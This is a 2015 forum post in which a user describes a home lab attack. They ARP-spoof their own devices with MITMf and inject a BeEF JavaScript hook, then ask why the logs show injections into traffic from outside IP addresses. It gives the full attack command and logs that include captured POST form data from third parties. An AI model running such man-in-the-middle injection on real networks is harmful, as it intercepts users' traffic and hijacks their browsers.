Threat when running MITMf with JS hook injection ?

**manusky** · 2015-12-21

Hello,

I am running Kali 2.0 on a VM and I made a small lab in my LAN with a laptop running Windows 7 x64, a MacBook Pro running OSX 10.10, an iPad and an iPhone both running iOS 9.2.
My LAN subnet is 192.168.178.0/24

I want to see the behavior of the browsers in the OS from my lab, so I injected a JS hook with MITMf and I use BeEF to explore the possibilities of each one.

Code:

(MITMf)root@kali-2:~/MITMf# python mitmf.py -i eth0 --spoof --arp --gateway 192.168.178.1 --target 192.168.178.27-30 --inject --js-url http://192.168.178.23:3000/hook.js

I am targeting the range 192.168.178.27-30 which corresponds to the devices in my lab, and 192.168.178.23 is Kali.
When I browse on Internet with my devices, I can see my broswers in BeEF when they are hooked.

I checked MITMf logs and here is my question.
I can see all the logs about the targeted devices (here my iPad):

Code:

2015-12-21 02:13:47 192.168.178.30 [type:Other-Other os:Other] conn.skype.com
2015-12-21 02:13:47 192.168.178.30 [type:Other-Other os:Other] [Inject] Injected JS script: conn.skype.com
2015-12-21 02:15:44 192.168.178.30 [type:Chrome Mobile iOS-47 os:iOS] translate.google.fr
2015-12-21 02:15:44 192.168.178.30 [type:Chrome Mobile iOS-47 os:iOS] [Inject] Injected JS script: translate.google.com
2015-12-21 02:16:04 192.168.178.30 [type:Chrome Mobile iOS-47 os:iOS] www.googleadservices.com
2015-12-21 02:27:30 192.168.178.30 [type:Mobile Safari-8 os:iOS] [Inject] Injected JS script: www.google.com
2015-12-21 02:27:30 192.168.178.30 [type:Mobile Safari-8 os:iOS] www.google.com
2015-12-21 02:27:31 192.168.178.30 [type:Mobile Safari-8 os:iOS] [Inject] Injected JS script: www.google.com
2015-12-21 02:27:31 192.168.178.30 [type:Mobile Safari-8 os:iOS] www.google.com

But after a while I start seeing logs about other machines out of my LAN:

Code:

2015-12-21 02:27:56 115.239.228.10 [type:IE-9 os:Windows 7] zc.qq.com
2015-12-21 02:27:56 115.239.228.10 [type:IE-9 os:Windows 7] [Inject] Injected JS script: zc.qq.com
2015-12-21 02:28:12 115.239.228.3 [type:IE-9 os:Windows 7] zc.qq.com
2015-12-21 02:28:12 115.239.228.10 [type:IE-9 os:Windows 7] zc.qq.com
2015-12-21 02:28:12 115.239.228.3 [type:IE-9 os:Windows 7] [Inject] Injected JS script: zc.qq.com
2015-12-21 02:28:12 115.239.228.10 [type:IE-9 os:Windows 7] [Inject] Injected JS script: zc.qq.com
2015-12-21 02:28:52 115.239.228.3 [type:Iron-21 os:Windows 8] zc.qq.com
2015-12-21 02:32:28 115.239.228.3 [type:Iron-21 os:Windows 8] POST Data (zc.qq.com):
verifycode=EEQA&country=1&province=63&city=9&isnongli=0&year=1991&month=12&day=2&isrunyue=0&password=a1b2279b359890bb0c8baeabf3ad71a29186f3b3cde5e9e861968b2674952cd43fbcd28f4f403bb6558fbae152b446a44dbf16af423e063d6d21af747865abe54021b2c2c612b0e0d3d97fb259a99717d95914d4877f9e4345775ae69d79ca5d6ddc13f6a643ec058542eeb84ec12b9f9c91d20c2f61ded8eafad517e0f0dacf&nick=%E5%B0%B3&email=false&other_email=false&elevel=1&***=1&qzdate=&jumpfrom=58030&telphone=&csloginstatus=1&d9c2=i6g0
2015-12-21 02:32:37 115.239.228.3 [type:Iron-21 os:Windows 8] a.zc.qq.com

IP's 115.239.228.X seems to belong to a China organization and I have never been on the website "zc.qq.com"
Does it mean this machine is attacking me ?
How can I avoid this ?

Thank you for your answers

Manu

Thread: Threat when running MITMf with JS hook injection ?

Thread Tools

Search Thread

Display

Threat when running MITMf with JS hook injection ?

Similar Threads

Windows security threat detections, Legit or False?

BeEF how to hook

How do I hook up a midi keyboard to kali?

Posting Permissions